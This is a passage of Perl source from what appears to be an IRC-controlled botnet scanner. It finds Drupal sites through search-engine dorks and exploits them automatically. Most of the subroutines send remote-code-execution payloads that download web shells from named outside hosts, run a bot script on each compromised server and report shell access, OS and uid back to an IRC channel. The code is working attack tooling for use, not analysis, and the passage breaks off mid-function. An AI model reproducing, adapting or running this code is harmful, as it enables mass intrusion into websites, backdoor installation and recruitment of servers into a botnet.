($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$dzlogo $engine sHeLL")."9 $shell 15SafeMod=$safe $os uid=$uid "); } } } exit; } } } } sub dru_exploit() { my $chan = $_[0]; my $dork = $_[1]; my $engine = $_[2]; my $count = 0; my @totexploit = &search_engine($chan,"",$dork,$engine,$drulogo,""); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$drulogo 14÷ 0$engine 14÷ 15[4 Close Access 15] "); } my $liat = "http".$site."/README.txt"; my $cek = &get_content($liat); if ($cek =~/ABOUT DRUPAL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &sx94($site,$chan,$engine); &sx96($site,$chan,$engine); &sx97($site,$chan,$engine); &sx98($site,$chan,$engine); &sx99($site,$chan,$engine); &sx100($site,$chan,$engine); &sx101($site,$chan,$engine); &sx102($site,$chan,$engine); &sx103($site,$chan,$engine); &sx104($site,$chan,$engine); &sx105($site,$chan,$engine); &sx106($site,$chan,$engine); &sx107($site,$chan,$engine); } exit; } } } } } sub sx94() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id'=> 'user_register_form','_drupal_ajax'=> '1','timezone[a][#lazy_builder][]'=> 'exec','timezone[a][#lazy_builder][][]'=> $payload]); my $check = $ua->get("http".$site.$bekdur)->content; if($check =~/
/) { my $test = "http".$site."drupal.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/){ my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); if ($nick eq $admin) { } else { #&msg("$nick","$drulogo15$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test."12 (SafeMode=$safe) (OS=$os) uid=$uid "); #&msg("$admin","$drulogo15$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test."12 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } } sub sx96() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_register_form','_drupal_ajax' => '1','mail[a][#post_render][]' => 'exec','mail[a][#type]' => 'markup','mail[a][#markup]' => $payload]); my $check = $ua->get("http".$site.$bekdur)->content; if($check =~/
/) { my $test = "http$site$bekdur"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/){ my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); # if ($nick eq $admin) { # } else { # &msg("$nick","$drulogo15$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test."12 (SafeMode=$safe) (OS=$os) uid=$uid "); # &msg("$admin","$drulogo15$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test."12 (SafeMode=$safe) (OS=$os) uid=$uid "); # } } } } sub sx97() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/renata.php+'http://franquiaeducacional.com.br/hawa.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."sites/default/files/renata.php")->content; if($check =~/
/) { my $test = "http".$site."sites/default/files/xxx.php"; my $test2 = "http".$site."error.php"; my $test3 = "http".$site."includes/include.php"; my $bypass = "http".$site."errors.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get2 = &get_content($test2); if ($get2 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test2 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get3 = &get_content($test3); if ($get3 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get3 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test3 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); } } } } sub sx99() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/default/files/js/.htaccess+htaccessx;curl+-o+sites/default/files/js/renata.php+'http://franquiaeducacional.com.br/hawa.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."sites/default/files/js/renata.php")->content; if($check =~/
/) { my $test = "http".$site."sites/default/files/js/renata.php"; my $test2 = "http".$site."error.php"; my $test3 = "http".$site."includes/include.php"; my $bypass = "http".$site."errors.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get2 = &get_content($test2); if ($get2 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test2 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get3 = &get_content($test3); if ($get3 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get3 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test3 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); } } } } sub sx100() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/default/files/ctools/.htaccess+htaccessx;curl+-o+sites/default/files/ctools/renata.php+'http://corp.yhi.com.sg//vertigo.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."sites/default/files/ctools/renata.php")->content; if($check =~/
/) { my $test = "http".$site."sites/default/files/ctools/renata.php"; my $test2 = "http".$site."error.php"; my $bypass = "http".$site."errors.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get2 = &get_content($test2); if ($get2 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test2 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } } } } sub sx101() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/default/files/languages/.htaccess+htaccessx;curl+-o+sites/default/files/languages/renata.php+'http://corp.yhi.com.sg//vertigo.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."sites/default/files/languages/renata.php")->content; if($check =~/
/) { my $test = "http".$site."sites/default/files/languages/xxx.php"; my $test2 = "http".$site."error.php"; my $bypass = "http".$site."errors.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } my $get2 = &get_content($test2); if ($get2 =~ /sEm - eXploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test2 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); &mylove($bypass,$chan,$site,$engine); } } } } sub sx98() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=curl http://dhinaurimai.com/payloads.php | wget http://dhinaurimai.com/payloads.php"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."payloads.php")->content; if($check =~/
/) { my $test = "http".$site."payloads.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); if ($nick eq $admin) { } else { #&msg("$nick","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); #&msg("$admin","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } } } sub sx102() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+includes/.htaccess+htaccessx;curl+-o+includes/xxx.php+'http://corp.yhi.com.sg//vertigo.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."includes/renata.php")->content; if($check =~/
/) { my $test = "http".$site."includes/xxx.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} #&msg("$chan","$drulogo15,1$engine 9[Success] 7(SafeMode=$safe) (OS=$os) uid=$uid"); &msg("$admin","$drulogo15$engine 4<9=4>10 Simple sHeLL 4<9=4>11 $test15 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { } else { #&msg("$nick","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); #&msg("$admin","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } } } sub sx103() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+profiles/minimal/.htaccess+htaccessx;curl+-o+profiles/minimal/xxx.php+'http://corp.yhi.com.sg//vertigo.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."profiles/minimal/renata.php")->content; if($check =~/
/) { my $test = "http".$site."profiles/minimal/xxx.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} #&msg("$chan","$drulogo15,1$engine 9[Success] 7(SafeMode=$safe) (OS=$os) uid=$uid"); &msg("$admin","$drulogo15$engine 4<9=4>10 Simple sHeLL 4<9=4>11 $test15 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { } else { #&msg("$nick","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); #&msg("$admin","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } } } sub sx104() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+modules/blog/.htaccess+htaccessx;curl+-o+modules/blog/xxx.php+'http://corp.yhi.com.sg//vertigo.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."modules/blog/renata.php")->content; if($check =~/
/) { my $test = "http".$site."modules/blog/xxx.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} #&msg("$chan","$drulogo15,1$engine 9[Success] 7(SafeMode=$safe) (OS=$os) uid=$uid"); &msg("$admin","$drulogo15$engine 4<9=4>10 Simple sHeLL 4<9=4>11 $test15 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { } else { #&msg("$nick","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); #&msg("$admin","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } } } sub sx105() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+misc/.htaccess+htaccessx;curl+-o+misc/xxx.php+'http://corp.yhi.com.sg//vertigo.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."misc/renata.php")->content; if($check =~/
/) { my $test = "http".$site."misc/xxx.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /sEm - eXploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} #&msg("$chan","$drulogo15,1$engine 9[Success] 7(SafeMode=$safe) (OS=$os) uid=$uid"); &msg("$admin","$drulogo15$engine 4<9=4>10 Simple sHeLL 4<9=4>11 $test15 (SafeMode=$safe) (OS=$os) uid=$uid "); if ($nick eq $admin) { } else { #&msg("$nick","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); #&msg("$admin","$drulogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$test."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } } } } } sub sx106() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/renata.phtml+'http://jfgsolutions.ca/renata.phtml'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."sites/default/files/renata.phtml")->content; if($check =~/
/) { my $test = "http".$site."sites/default/files/renata.phtml"; my $test2 = "http".$site."authorize_old.php"; my $test3 = "http".$site."includes/include.php"; my $bypass = "http".$site."errors.php"; my $cekap = &get_content($test."?cmd=curl+-C+-+-O+".$botxx."%3Bperl+bot.log%3Brm+bot.log"); if ($cekap =~ /roin - exploit/) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); } my $get2 = &get_content($test2); if ($get2 =~ /roin - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test2 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); } my $get3 = &get_content($test3); if ($get3 =~ /roin - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($get3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get3 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$drulogo5[4-5=4[8$engine4]5=4-5] 4$test3 14[3$os14][3safemode10:3$safe14]"); &msg("$admin","$drulogo 15[14÷0 $engine 14÷15] 11sHell Access 4[0 $os 4]4[0 safemode10:3$safe 4]"); } } } } sub sx107() { my ($site,$chan,$engine) = @_; $test = "http".$site; $nyoba = &get_content($test); if ($nyoba =~ /\/sites\/all\/(.*?)\//i) { $theme = $1; } my $kirim = "http".$site."/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=mv+sites/all/.htaccess+htaccessx;curl+-o+sites/all/xxx.php+'http://franquiaeducacional.com.br/hawa.php'"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $ajax = "_triggering_element_name"; my $exploit = $ua->post($kirim, Content-Type => 'application/json', Content => ['form_id' => 'user_pass', $ajax => 'name']); my $body = $exploit->content; my $regex=''; if($body =~ s/$regex//){ my $newout = $1; my $formcraft3up = "http".$site."/?q=file/ajax/name/%23value/$newout"; my $exploitx = $ua->post($formcraft3up, Content-Type => 'application/json', Content => ['form_build_id' => $newout]); my $check = $ua->get("http".$site."sites/all/renata.php")->content; if($check =~/
